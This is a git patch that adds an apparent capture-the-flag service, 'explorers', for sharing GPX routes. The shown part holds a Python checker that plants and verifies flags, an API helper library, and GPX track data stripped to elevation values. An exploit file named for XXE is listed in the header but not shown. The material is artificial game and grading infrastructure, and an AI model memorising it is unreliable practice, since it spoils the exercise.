From 5f18bbd59da49aeaa7f3e4c2e3188165607d3c27 Mon Sep 17 00:00:00 2001 From: jnovikov Date: Sun, 19 Nov 2023 00:32:30 +0000 Subject: [PATCH 1/4] Explorers: MVP service ready (checker, backend, sploit). --- check.py | 1 + checkers/explorers/checker.py | 190 + checkers/explorers/explorers_lib.py | 79 + checkers/explorers/gpx_ds_small.csv | 98021 ++++++++++++++++++++ checkers/explorers/gpxhelper.py | 106 + checkers/requirements.txt | 1 + services/explorers/Dockerfile | 15 + services/explorers/app.env | 3 + services/explorers/docker-compose.yml | 25 + services/explorers/src/app/__init__.py | 0 services/explorers/src/app/api.py | 187 + services/explorers/src/app/app.py | 25 + services/explorers/src/app/auth.py | 24 + services/explorers/src/app/config.py | 15 + services/explorers/src/app/db.py | 12 + services/explorers/src/app/dto.py | 48 + services/explorers/src/app/models.py | 40 + services/explorers/src/app/serializers.py | 65 + services/explorers/src/main.py | 17 + services/explorers/src/requirements.txt | 23 + sploits/explorers/xxe.py | 64 + 21 files changed, 98961 insertions(+) create mode 100755 checkers/explorers/checker.py create mode 100644 checkers/explorers/explorers_lib.py create mode 100644 checkers/explorers/gpx_ds_small.csv create mode 100644 checkers/explorers/gpxhelper.py create mode 100644 services/explorers/Dockerfile create mode 100644 services/explorers/app.env create mode 100644 services/explorers/docker-compose.yml create mode 100644 services/explorers/src/app/__init__.py create mode 100644 services/explorers/src/app/api.py create mode 100644 services/explorers/src/app/app.py create mode 100644 services/explorers/src/app/auth.py create mode 100644 services/explorers/src/app/config.py create mode 100644 services/explorers/src/app/db.py create mode 100644 services/explorers/src/app/dto.py create mode 100644 services/explorers/src/app/models.py create mode 100644 services/explorers/src/app/serializers.py create mode 100644 services/explorers/src/main.py create mode 100644 services/explorers/src/requirements.txt create mode 100644 sploits/explorers/xxe.py diff --git a/check.py b/check.py index 0347594..de414a1 100755 --- a/check.py +++ b/check.py @@ -67,6 +67,7 @@ ALLOWED_CHECKER_PATTERNS = [ "import requests", + "requests/", "requests.exceptions", "s: requests.Session", "sess: requests.Session", diff --git a/checkers/explorers/checker.py b/checkers/explorers/checker.py new file mode 100755 index 0000000..a6e3b98 --- /dev/null +++ b/checkers/explorers/checker.py @@ -0,0 +1,190 @@ +#!/usr/bin/env python3 +import random +import re +import string +import sys + +import requests +from checklib import * +from checklib import status + +import explorers_lib +import gpxhelper + + +class Checker(BaseChecker): + vulns: int = 1 + timeout: int = 15 + uses_attack_data: bool = True + + req_ua_agents = ['python-requests/2.{}.0'.format(x) for x in range(15, 28)] + + def __init__(self, *args, **kwargs): + super(Checker, self).__init__(*args, **kwargs) + self.gpx_helper = gpxhelper.TrackHelper() + self.lib = explorers_lib.ExplorersLib(self) + self.id_regexp = re.compile(r'^[0-9A-Za-z]{1,40}$') + + def session_with_req_ua(self): + sess = get_initialized_session() + if random.randint(0, 1) == 1: + sess.headers['User-Agent'] = random.choice(self.req_ua_agents) + return sess + + def random_route_name(self): + return 'Expedition #{}'.format(random.randint(1, 10000)) + + def random_description(self, name: str): + choices = ['how was it', 'report', 'detailed report', 'what we found', 'confidential'] + if random.randint(0, 1) == 1: + return name + ':' + rnd_string(20) + return '{}: {}'.format(name, random.choice(choices)) + + def validate_rid(self, mid): + self.assert_eq(bool(self.id_regexp.fullmatch(mid)), True, 'Invalid id format') + + def action(self, action, *args, **kwargs): + try: + super(Checker, self).action(action, *args, **kwargs) + except requests.exceptions.ConnectionError: + self.cquit(Status.DOWN, 'Connection error', 'Got requests connection error') + + def check(self): + session = self.session_with_req_ua() + username, password = rnd_username(), rnd_password() + + self.lib.signup(session, username, password) + self.lib.signin(session, username, password) + + random_name = self.random_route_name() + random_description = self.random_description(random_name) + route = self.lib.create_route(session, random_name, random_description) + + route_id = route.get('id') + + self.validate_rid(route_id) + self.assert_eq(route.get('title'), random_name, 'Failed to create route') + self.assert_eq(route.get('description'), random_description, 'Failed to create route') + + wpts = [ + gpxhelper.WaypointParams( + name='Oil found', + description='Oil found at {}m'.format(random.randint(100, 1000) / 10) + ), + gpxhelper.WaypointParams( + name='Oil not found', + description='No oil was found', + ) + ] + if random.randint(0, 1) == 1: + wpts.append(gpxhelper.WaypointParams( + name='Oil found', + description='Oil found at {}m'.format(random.randint(100, 1000) / 10) + )) + + gpx_file = self.gpx_helper.random_gpx_from_ds(username, wpts) + + updated_gpx = self.lib.upload_gpx(session, route_id, gpx_file) + got_waypoints = updated_gpx.get('waypoints', []) + got_tracks = updated_gpx.get('track_points', []) + + self.assert_eq(set(x.name for x in wpts), set(x.get('name') for x in got_waypoints), 'Failed to upload gpx') + self.assert_eq(set(x.description for x in wpts), set(x.get('desc') for x in got_waypoints), + 'Failed to upload gpx') + + got_waypoints[-1]['name'] = rnd_string(31, alphabet=string.ascii_uppercase + string.digits) + got_waypoints[-1]['desc'] = rnd_string(31, alphabet=string.ascii_uppercase + string.digits) + new_description = rnd_string(31, alphabet=string.ascii_uppercase + string.digits) + + self.lib.update_route(session, route_id, new_description, got_tracks, got_waypoints) + updated_gpx = self.lib.get_route(session, route_id) + + self.assert_eq(updated_gpx.get('description'), new_description, 'Failed to update route') + self.assert_eq(set(x.get('name') for x in got_waypoints), set(x.get('name') for x in updated_gpx['waypoints']), + 'Failed to update route') + self.assert_eq(set(x.get('desc') for x in got_waypoints), + set(x.get('desc') for x in updated_gpx['waypoints']), + 'Failed to update route') + + u2, p2 = rnd_username(), rnd_password() + s2 = self.session_with_req_ua() + self.lib.signup(s2, u2, p2) + + gpx_by_token = self.lib.get_route(s2, route_id, updated_gpx.get('share_token')) + self.assert_eq(gpx_by_token.get('title'), random_name, 'Failed to get route by token') + self.assert_eq(gpx_by_token.get('description'), new_description, 'Failed to get route by token') + self.assert_eq(set(x.get('name') for x in got_waypoints), set(x.get('name') for x in gpx_by_token['waypoints']), + 'Failed to get route by token') + self.assert_eq(set(x.get('desc') for x in got_waypoints), + set(x.get('desc') for x in gpx_by_token['waypoints']), + 'Failed to get route by token') + + self.cquit(Status.OK) + + def put(self, flag_id: str, flag: str, vuln: str): + sess = self.session_with_req_ua() + u = rnd_username() + p = rnd_password() + + self.lib.signup(sess, u, p) + self.lib.signin(sess, u, p) + + name = self.random_route_name() + description = flag + + route = self.lib.create_route(sess, name, description) + route_id = route.get('id') + + self.validate_rid(route_id) + self.assert_eq(route.get('title'), name, 'Failed to create route') + self.assert_eq(route.get('description'), description, 'Failed to create route') + + wpts = [ + gpxhelper.WaypointParams( + name='Oil found', + description='Oil found at {}m'.format(random.randint(100, 1000) / 10) + ), + ] + + gpx_file = self.gpx_helper.random_gpx(creator=u, waypoints=wpts, num_points=random.randint(5, 15)) + self.lib.upload_gpx(sess, route_id, gpx_file) + + updated_gpx = self.lib.get_route(sess, route_id) + + self.assert_eq(flag, updated_gpx.get('description'), 'Failed to upload gpx') + self.assert_eq(name, updated_gpx.get('title'), 'Failed to upload gpx') + self.assert_eq(set(x.name for x in wpts), set(x.get('name') for x in updated_gpx['waypoints']), + 'Failed to upload gpx') + self.assert_eq(set(x.description for x in wpts), set(x.get('desc') for x in updated_gpx['waypoints']), + 'Failed to upload gpx') + + self.cquit(Status.OK, f"{u}:{p}:{route_id}") + + def get(self, flag_id: str, flag: str, vuln: str): + u, p, route_id = flag_id.split(':') + sess = self.session_with_req_ua() + self.lib.signin(sess, u, p, status=Status.CORRUPT) + + route = self.lib.get_route(sess, route_id, status=Status.CORRUPT) + self.assert_eq(route.get('description'), flag, 'Failed to get route', status=Status.CORRUPT) + + u, p = rnd_username(), rnd_password() + new_sess = self.session_with_req_ua() + self.lib.signup(new_sess, u, p) + + new_sess = self.session_with_req_ua() + self.lib.signin(new_sess, u, p) + + route = self.lib.get_route(new_sess, route_id, token=route.get('share_token'), status=Status.CORRUPT) + self.assert_eq(route.get('description'), flag, 'Failed to get route by token', status=Status.CORRUPT) + + self.cquit(Status.OK) + + +if __name__ == '__main__': + c = Checker(sys.argv[2]) + + try: + c.action(sys.argv[1], *sys.argv[3:]) + except c.get_check_finished_exception() as e: + cquit(status.Status(c.status), c.public, c.private) diff --git a/checkers/explorers/explorers_lib.py b/checkers/explorers/explorers_lib.py new file mode 100644 index 0000000..8b4eaa3 --- /dev/null +++ b/checkers/explorers/explorers_lib.py @@ -0,0 +1,79 @@ +import checklib +from checklib import BaseChecker +import requests + +PORT = 8000 + + +class ExplorersLib: + @property + def api_url(self): + return f'http://{self.host}:{self.port}/api' + + def __init__(self, checker: BaseChecker, port=PORT, host=None): + self.c = checker + self.port = port + self.host = host or self.c.host + + def signup(self, session: requests.Session, username: str, password: str): + resp = session.post(f'{self.api_url}/signup', json={ + 'username': username, + 'password': password + }) + self.c.assert_eq(resp.status_code, 200, 'Failed to signup') + resp_json = self.c.get_json(resp, 'Failed to signup: invalid JSON') + return resp_json + + def signin(self, session: requests.Session, username: str, password: str, + status: checklib.Status = checklib.Status.MUMBLE): + resp = session.post(f'{self.api_url}/signin', json={ + 'username': username, + 'password': password + }) + self.c.assert_eq(resp.status_code, 200, 'Failed to signin', status=status) + resp_json = self.c.get_json(resp, 'Failed to signin: invalid JSON') + return resp_json + + def create_route(self, session: requests.Session, title: str, description: str): + resp = session.post(f'{self.api_url}/route/create', json={ + 'title': title, + 'description': description + }) + self.c.assert_eq(resp.status_code, 200, 'Failed to create route') + resp_json = self.c.get_json(resp, 'Failed to create route: invalid JSON') + self.c.assert_eq(type(resp_json), dict, 'Failed to create route: invalid JSON') + return resp_json + + def get_route(self, session: requests.Session, route_id: str, token: str | None = None, + status: checklib.Status = checklib.Status.MUMBLE): + params = {} + if token: + params['token'] = token + resp = session.get(f'{self.api_url}/route/{route_id}', params=params) + self.c.assert_eq(resp.status_code, 200, 'Failed to get route', status=status) + resp_json = self.c.get_json(resp, 'Failed to get route: invalid JSON') + self.c.assert_eq(type(resp_json), dict, 'Failed to get route: invalid JSON') + return resp_json + + def update_route(self, session: requests.Session, route_id: str, description: str, points=list[dict], + waypoints=list[dict]): + pld = { + 'description': description, + 'track_points': points, + 'waypoints': waypoints + } + resp = session.post(f'{self.api_url}/route/{route_id}/update', json=pld) + + self.c.assert_eq(resp.status_code, 200, 'Failed to update route') + resp_json = self.c.get_json(resp, 'Failed to update route: invalid JSON') + self.c.assert_eq(type(resp_json), dict, 'Failed to update route: invalid JSON') + return resp_json + + def upload_gpx(self, session: requests.Session, route_id: str, file): + resp = session.post(f'{self.api_url}/route/{route_id}/upload', files={ + 'file': file + }) + self.c.assert_eq(resp.status_code, 200, 'Failed to upload gpx') + resp_json = self.c.get_json(resp, 'Failed to upload gpx: invalid JSON') + self.c.assert_eq(type(resp_json), dict, 'Failed to upload gpx: invalid JSON') + return resp_json diff --git a/checkers/explorers/gpx_ds_small.csv b/checkers/explorers/gpx_ds_small.csv new file mode 100644 index 0000000..33c9c57 --- /dev/null +++ b/checkers/explorers/gpx_ds_small.csv @@ -0,0 +1,98021 @@ +gpx +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +2014-10-30 08:50 + + + + + +OruxMaps + + + +2014-10-30 08:50 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2014-10-30 08:50</h2><br /><p>Orario inizio: 10/30/2014 08:51</p><p>Orario fine: 10/30/2014 13:25</p><p>Distanza: 5,2 km (04:34)</p><p>Tempo movimento: 02:58</p><p>Media segmento attuale: 1,1 km/h</p><p>Media veloc. mov.: 1,7 km/h</p><p>Max. Velocità: 24 km/h</p><p>Altitudine minima: 1290 m</p><p>Altitudine massima: 2406 m</p><p>Velocità di salita: 406,3 m/h</p><p>Velocità di discesa: -582,7 m/h</p><p>Guadagno di elevazione: 1240 m</p><p>Perdita di elevazione: -155 m</p><p>Tempo di salita: 03:03</p><p>Tempo di discesa: 00:16</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +1303.61 + + + +1295.42 + + + +1291.21 + + + +1313.38 + + + +1364.84 + + + +1372.75 + + + +1557.32 + + + +1582.28 + + + +1454.28 + + + +1417.27 + + + +1385.31 + + + +1392.0 + + + +1412.06 + + + +1415.4 + + + +1441.75 + + + +1446.55 + + + +1442.95 + + + +1448.12 + + + +1452.9 + + + +1469.98 + + + +1480.13 + + + +1488.04 + + + +1523.06 + + + +1545.88 + + + +1542.45 + + + +1544.81 + + + +1567.65 + + + +1612.92 + + + +1613.1 + + + +1619.66 + + + +1637.62 + + + +1664.87 + + + +1705.98 + + + +1718.73 + + + +1737.93 + + + +1776.63 + + + +1818.19 + + + +1806.82 + + + +1840.93 + + + +1847.86 + + + +1832.1 + + + +1835.42 + + + +1843.77 + + + +1868.22 + + + +1884.87 + + + +1908.26 + + + +1932.32 + + + +1959.99 + + + +1969.25 + + + +2012.84 + + + +2011.22 + + + +2060.91 + + + +2063.63 + + + +2084.33 + + + +2105.09 + + + +2134.92 + + + +2176.71 + + + +2190.95 + + + +2224.99 + + + +2263.6 + + + +2294.68 + + + +2304.55 + + + +2340.46 + + + +2355.79 + + + +2400.14 + + + +2139.61 + +" +" + + + + + + +Garmin International + + +22-DEC-16 13:28:25 + + + + + +15.52 + + + + + +28.5 + + + + + +43.4 + + + + + +43.4 + + + + + +59.74 + + + + + +92.42 + + + + + +115.5 + + + + + +145.78 + + + + + +169.33 + + + + + +183.75 + + + + + +192.4 + + + + + +213.55 + + + + + +222.68 + + + + + +229.41 + + + + + +244.79 + + + + + +252.48 + + + + + +251.04 + + + + + +253.44 + + + + + +256.33 + + + + + +259.21 + + + + + +255.37 + + + + + +252.48 + + + + + +244.79 + + + + + +239.51 + + + + + +236.62 + + + + + +236.62 + + + + + +233.26 + + + + + +230.37 + + + + + +229.89 + + + + + +227.97 + + + + + +228.45 + + + + + +226.53 + + + + + +213.55 + + + + + +161.16 + + + + + +148.66 + + + + + +135.68 + + + + + +123.67 + + + + + +103.48 + + + + + +95.79 + + + + + +70.79 + + + + + +65.03 + + + + + +44.84 + + + + + +36.67 + + + + + +30.42 + + + + + +27.53 + + + + + +28.5 + + + + + +28.5 + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Hornbachegg - Schaber - Oberwald + + + + + + + + + +777.6 + + +771.9999790383827 + + +767.7 + + +761.1 + + +760.3000082267885 + + +761.2000174376734 + + +775.1000409222651 + + +775.380816675588 + + +782.3000333038073 + + +784.9999528493667 + + +787.2728723277879 + + +789.9000189640379 + + +795.6000408807362 + + +809.810905249848 + + +809.2525384002661 + + +819.9000119144234 + + +822.8999909613445 + + +834.6999379232229 + + +837.5000198913325 + + +842.8000251403425 + + +864.7999330449643 + + +902.0 + + +910.5000194100919 + + +929.6999677098156 + + +939.89998743058 + + +940.8767935973865 + + +962.2243949053202 + + +965.9000629414012 + + +1008.4000024765363 + + +1020.8999799631872 + + +1002.1999860105111 + + +986.5000082169274 + + +990.9999744797325 + + +979.9 + + +958.9 + + +946.3999988536326 + + +943.9000055319067 + + +948.2503481615347 + + +955.9 + + +956.2000223563365 + + +960.1 + + +956.9000160458379 + + +953.0999826635642 + + +949.7 + + +930.7000189640913 + + +927.6999994396256 + + +925.0 + + +927.6999994396256 + + +925.5271754923224 + + +926.499997623785 + + +920.6000284266117 + + +909.8999968088965 + + +896.0000019888164 + + +885.2 + + +885.5999948607501 + + +881.1999678321605 + + +873.1797469845723 + + +865.500006443939 + + +847.7000246456774 + + +832.4000108770484 + + +817.2999985395498 + + +816.0999948157518 + + +810.8999904588321 + + +814.1999990213632 + + +814.5000031285637 + + +811.3 + + +806.7000164606216 + + +796.0000525126504 + + +783.800093093686 + + +777.2999350434964 + + +764.3 + + +753.9 + + +746.2 + + +741.1999992727384 + + +740.3 + + +740.9000286048406 + + +743.3 + + +748.6 + + +757.8 + + +771.4 + + +777.4 +" +" + + + + + + + +Yerevan Cascade +At an altitude of 900 meter Yerevan is dominated by the mighty silhouette of Noah's mountain, Ararat. However, for generations Ararat and the former Armenian land around it has belonged to Turkey. One can sense a certain melancholy or resignation in this stony country that has suffered repeated conquests and earth quakes. Yet Yerevan has a fresh atmosphere, although the years after independence from the former Soviet Union were tumultuous. The visitor sees a young, quite egalitarian country. + +To fully explore the capital of Armenia, one needs several days. Thankfully, street names and locations in Yerevan are now signposted in both Armenian and Latin script. Tourism is welcome with an air of honest hospitality. Restaurants of all kind and budgets are everywhere, Jazz clubs are going through a revival. + +Climbing the Yerevan Cascade from the bottom to the top is a good exercise - repeat as often as needed. The upper third of the stairs leads past a huge construction pit, which is likely to remain under construction for a while. The lower part can be also overcome by escalators. + +At each level, there are pieces of art, both outside on the stairs and inside where the escalators are. The whole area is an open-air museum of modern art. + +At an altitude of 900 meter Yerevan is dominated by the mighty silhouette of Noah's mountain, Ararat. However, for generations Ararat and the former Armenian land around it has belonged to Turkey. One can sense a certain melancholy or resignation in this stony country that has suffered repeated conquests and earth quakes. Yet Yerevan has a fresh atmosphere, although the years after independence from the former Soviet Union were tumultuous. The visitor sees a young, quite egalitarian country. + +To fully explore the capital of Armenia, one needs several days. Thankfully, street names and locations in Yerevan are now signposted in both Armenian and Latin script. Tourism is welcome with an air of honest hospitality. Restaurants of all kind and budgets are everywhere, Jazz clubs are going through a revival. + +Climbing the Yerevan Cascade from the bottom to the top is a good exercise - repeat as often as needed. The upper third of the stairs leads past a huge construction pit, which is likely to remain under construction for a while. The lower part can be also overcome by escalators. + +At each level, there are pieces of art, both outside on the stairs and inside where the escalators are. The whole area is an open-air museum of modern art. + + + + +945.3 + + + +950.9 + + + +1017.5 + + + +1019.4 + + + +1028.6 + + + +1039.9 + + + +1044.3 + + + +1052.5 + + + +1057.6 + + + +1057.0 + + + +1043.2 + + + +1041.8 + + + +1038.4 + + + +1033.8 + + + +1023.1 + + + +1016.0 + + + +1011.2 + + + +941.7 + +" +" + + + + + + +Garmin International + + +2015-10-12 13:09:55 + + + + + + +2085.77 + + + +2102.37 + + + +2126.75 + + + +2141.16 + + + +2227.93 + + + +2244.74 + +" +" + + +Kandersteg + +Monika Teusch - Community + + + + + +Kandersteg + + + +1181.40479 + + +1176.14877 + + +1177.41623 + + +1175.92416 + + +1179.1567 + + +1172.06747 + + +1172.35202 + + +1173.22641 + + +1171.47494 + + +1174.69516 + + +1175.14291 + + +1180.08859 + + +1173.46408 + + +1176.82284 + + +1182.1318 + + +1189.20187 + + +1198.85409 + + +1205.68527 + + +1219.86129 + + +1226.6799 + + +1236.04245 + + +1250.90439 + + +1259.1766 + + +1273.83639 + + +1277.17282 + + +1287.39474 + + +1308.01022 + + +1318.19772 + + +1311.52499 + + +1304.61813 + + +1304.31503 + + +1301.64816 + + +1293.50424 + + +1289.71701 + + +1286.14108 + + +1279.72006 + + +1268.75839 + + +1268.43209 + + +1263.13144 + + +1254.69626 + + +1248.68637 + + +1225.40793 + + +1213.8049 + + +1214.22018 + + +1211.18966 + + +1210.91793 + + +1209.77548 + + +1209.0903 + + +1192.12704 + + +1174.78085 + + +1173.10202 + + +1174.69308 + + +1176.42196 + + +1174.29269 + + +1176.70285 + + +1176.82724 + + +1175.96798 + + +1181.93295 +" +" + + +Südtirol + + + + + + +OruxMaps + + + +Südtirol + +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Südtirol +</h2><br /><p>Startzeit: 05/28/2015 13:19</p><p>Zielzeit: 05/28/2015 17:27</p><p>Strecke: 4,8km (04:08)</p><p>Bewegungszeit: 02:12</p><p>Ø-Geschwindigkeit: 1,2km/h</p><p>Netto-Geschwindigkeit: 2,2km/h</p><p>Max. Geschwindigkeit: 7,9km/h</p><p>Minimale Höhe: 1472m</p><p>Maximale Höhe: 2086m</p><p>Steig-Geschw.: 354,3m/h</p><p>Sink-Geschw.: -508,6m/h</p><p>Aufstieg: 657m</p><p>Abstieg: -643m</p><p>Steigzeit: 01:51</p><p>Sinkzeit: 01:15</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1472.87 + + + +1511.6 + + + +1532.6 + + + +1533.11 + + + +1525.24 + + + +1513.79 + + + +1556.24 + + + +1586.74 + + + +1611.61 + + + +1620.36 + + + +1643.22 + + + +1682.37 + + + +1701.11 + + + +1723.7 + + + +1772.63 + + + +1797.74 + + + +1821.24 + + + +1845.14 + + + +1842.28 + + + +1841.15 + + + +1837.87 + + + +1843.35 + + + +1850.22 + + + +1873.75 + + + +1891.26 + + + +1893.15 + + + +1941.3 + + + +1993.37 + + + +1994.74 + + + +1994.75 + + + +2037.58 + + + +2071.41 + + + +2046.24 + + + +2054.02 + + + +2033.71 + + + +1987.21 + + + +1969.74 + + + +1944.3 + + + +1934.24 + + + +1926.91 + + + +1914.24 + + + +1907.66 + + + +1869.47 + + + +1866.94 + + + +1860.32 + + + +1836.99 + + + +1838.37 + + + +1815.6 + + + +1785.44 + + + +1738.75 + + + +1728.51 + + + +1719.16 + + + +1648.74 + + + +1631.66 + + + +1628.65 + + + +1606.83 + + + +1556.77 + + + +1539.39 + + + +1532.89 + + + +1534.01 + + + +1527.21 + + + +1517.74 + + + +1508.24 + +" +" + + + + + + + +ES CHA + + + +2240.7 + + +2245.1 + + +2255.9 + + +2254.8 + + +2269.6 + + +2289.9 + + +2296.5 + + +2298.5 + + +2306.5 + + +2315.9 + + +2325.3 + + +2324.8 + + +2355.0 + + +2367.8 + + +2410.0 + + +2447.2 + + +2457.6 + + +2488.9 + + +2493.6 + + +2494.3 + + +2497.2 + + +2497.9 + + +2509.2 + + +2512.2 + + +2523.0 + + +2510.4 + + +2511.2 + + +2504.7 + + +2508.4 + + +2512.9 + + +2506.9 + + +2530.1 + + +2527.1 + + +2537.7 + + +2541.5 + + +2541.3 + + +2543.7 + + +2542.6 + + +2544.4 + + +2541.3 + + +2544.1 + + +2543.1 + + +2542.6 + + +2548.2 + + +2559.4 + + +2566.1 + + +2566.4 + + +2582.3 + + +2584.4 + + +2583.2 + + +2577.9 + + +2567.8 + + +2567.4 + + +2561.1 + + +2549.1 + + +2543.4 + + +2542.6 + + +2545.1 + + +2542.4 + + +2545.4 + + +2541.5 + + +2544.8 + + +2539.4 + + +2524.8 + + +2532.2 + + +2525.0 + + +2512.0 + + +2513.6 + + +2509.1 + + +2506.6 + + +2511.3 + + +2511.1 + + +2527.0 + + +2512.0 + + +2510.7 + + +2498.7 + + +2497.6 + + +2494.9 + + +2493.5 + + +2488.9 + + +2459.5 + + +2448.6 + + +2411.9 + + +2378.7 + + +2367.3 + + +2358.1 + + +2327.0 + + +2328.5 + + +2312.6 + + +2302.4 + + +2297.3 + + +2297.1 + + +2290.9 + + +2263.6 + + +2254.7 + + +2248.3 + + +2246.6 +" +" + + +Tourenplanung am 6. Dezember 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 6. Dezember 2016 + + + +157.82562 + + +167.13117 + + +220.74952 + + +314.1449 + + +293.1787 + + +339.17237 + + +376.80728 + + +369.81682 + + +207.23686 + + +170.90057 + + +105.30196 + + +46.22518 + + +11.82509 + + +41.19238 + + +36.39179 + + +11.09813 + + +12.94019 + + +28.69552 + + +64.43588 + + +102.66808 + + +128.50967 + + +136.56321 + + +168.89371 + + +234.29382 + + +265.06487 + + +297.5384 + + +369.35701 + + +460.50139 + + +516.83812 + + +536.82079 + + +561.39363 + + +585.46961 + + +584.59604 + + +584.32383 + + +638.46199 + + +652.13638 + + +610.00372 + + +575.87188 + + +571.04037 + + +538.42405 + + +485.97133 + + +496.71864 + + +434.93157 + + +383.33893 + + +309.20505 + + +228.96738 + + +193.32873 + + +161.95609 + + +157.79821 + + +158.39 + + +157.82562 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2018-03-25 14:50:14 + + + + + + +1821.99 + + + +1815.9 + + + +1806.86 + + + +1808.44 + + + +1817.19 + + + +1833.2 + + + +1847.87 + + + +1852.21 + + + +1859.68 + + + +1858.93 + + + +1863.31 + + + +1918.9 + + + +1946.98 + + + +1962.71 + + + +1992.26 + + + +1998.72 + + + +2026.98 + + + +2045.16 + + + +2086.36 + + + +2101.47 + + + +2109.38 + + + +2130.39 + + + +2136.96 + + + +2141.53 + + + +2135.52 + + + +2138.35 + + + +2131.97 + + + +2144.04 + + + +2140.8 + + + +2144.46 + + + +2160.31 + + + +2170.27 + + + +2159.28 + + + +2152.93 + + + +2159.57 + + + +2160.26 + + + +2151.31 + + + +2144.82 + + + +2142.31 + + + +2142.07 + + + +2128.94 + + + +2131.45 + + + +2120.06 + + + +2112.96 + + + +2104.77 + + + +2101.25 + + + +2095.55 + + + +2097.63 + + + +2097.13 + + + +2095.45 + + + +2089.36 + + + +2086.11 + + + +2072.3 + + + +2060.83 + + + +2065.25 + + + +2001.57 + + + +1943.86 + + + +1917.81 + + + +1915.42 + + + +1920.77 + + + +1890.72 + + + +1863.15 + + + +1849.0 + + + +1854.51 + + + +1842.79 + + + +1831.33 + + + +1825.35 + + + +1807.44 + + + +1800.15 + + + +1797.04 + + + +1807.62 + + + +1807.56 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +1116.0 + + + +1122.0 + + + +1123.0 + + + +1130.0 + + + +1143.0 + + + +1147.0 + + + +1171.0 + + + +1198.0 + + + +1205.0 + + + +1220.0 + + + +1233.0 + + + +1258.0 + + + +1273.0 + + + +1280.0 + + + +1297.0 + + + +1310.0 + + + +1322.0 + + + +1331.0 + + + +1340.0 + + + +1340.0 + + + +1351.0 + + + +1369.0 + + + +1377.0 + + + +1391.0 + + + +1403.0 + + + +1424.0 + + + +1426.0 + + + +1450.0 + + + +1486.0 + + + +1501.0 + + + +1503.0 + + + +1518.0 + + + +1532.0 + + + +1551.0 + + + +1559.0 + + + +1575.0 + + + +1576.0 + + + +1593.0 + + + +1604.0 + + + +1633.0 + + + +1639.0 + + + +1643.0 + + + +1657.0 + + + +1675.0 + + + +1693.0 + + + +1707.0 + + + +1716.0 + + + +1750.0 + + + +1758.0 + + + +1793.0 + + + +1805.0 + + + +1852.0 + +" +" + + + +Pavel Fuemm + + + + +Endomondo + + +Sunsetwalk am Laubberg +http://www.endomondo.com/ + +Sunsetwalk am Laubberg +HIKING + + + + + +474.0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +481.0 + + + + + + + + + + + + + + + + + + + + + + + + +498.0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +516.0 + + + +529.0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +515.0 + + + +512.0 + + + +508.0 + + + +505.0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +471.0 + + + + + + + + + + +463.0 + + + + + + + + + + +444.0 + + + +439.0 + + + +433.0 + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +2015-10-21 14:56 + + + + + +OruxMaps + + + +2015-10-21 14:56 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2015-10-21 14:56</h2><br /><p>Startzeit: 10/21/2015 14:56</p><p>Zielzeit: 10/21/2015 16:20</p><p>Strecke: 2,9km (01:24)</p><p>Bewegungszeit: 01:00</p><p>Ø-Geschwindigkeit: 2km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 8,1km/h</p><p>Minimale Höhe: 1979m</p><p>Maximale Höhe: 2741m</p><p>Steig-Geschw.: 112,8m/h</p><p>Sink-Geschw.: -541,9m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -626m</p><p>Steigzeit: 00:01</p><p>Sinkzeit: 01:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2741.33 + + + +2709.62 + + + +2660.37 + + + +2655.23 + + + +2617.18 + + + +2571.18 + + + +2545.21 + + + +2528.36 + + + +2513.21 + + + +2509.58 + + + +2496.24 + + + +2492.21 + + + +2474.61 + + + +2443.11 + + + +2431.62 + + + +2390.21 + + + +2372.72 + + + +2365.71 + + + +2349.1 + + + +2334.86 + + + +2283.23 + + + +2148.22 + + + +2135.63 + + + +2110.83 + + + +2100.34 + + + +2088.69 + + + +2060.66 + + + +2047.33 + + + +1998.39 + + + +1988.61 + + + +1979.71 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + +781.599975585938 + + + +785.799987792969 + + + +785.799987792969 + + + +788.0 + + + +788.0 + + + +788.0 + + + +788.0 + + + +790.0 + + + +796.200012207031 + + + +802.200012207031 + + + +802.200012207031 + + + +805.599975585938 + + + +810.599975585938 + + + +818.799987792969 + + + +821.799987792969 + + + +828.599975585938 + + + +831.400024414062 + + + +835.599975585938 + + + +847.599975585938 + + + +856.599975585938 + + + +863.200012207031 + + + +871.599975585938 + + + +886.0 + + + +904.400024414062 + + + +908.599975585938 + + + +914.799987792969 + + + +921.0 + + + +923.400024414062 + + + +939.0 + + + +944.400024414062 + + + +970.599975585938 + + + +976.599975585938 + + + +982.799987792969 + + + +990.400024414062 + + + +998.599975585938 + + + +1007.59997558594 + + + +1007.59997558594 + + + +1052.59997558594 + + + +1066.59997558594 + + + +1068.80004882812 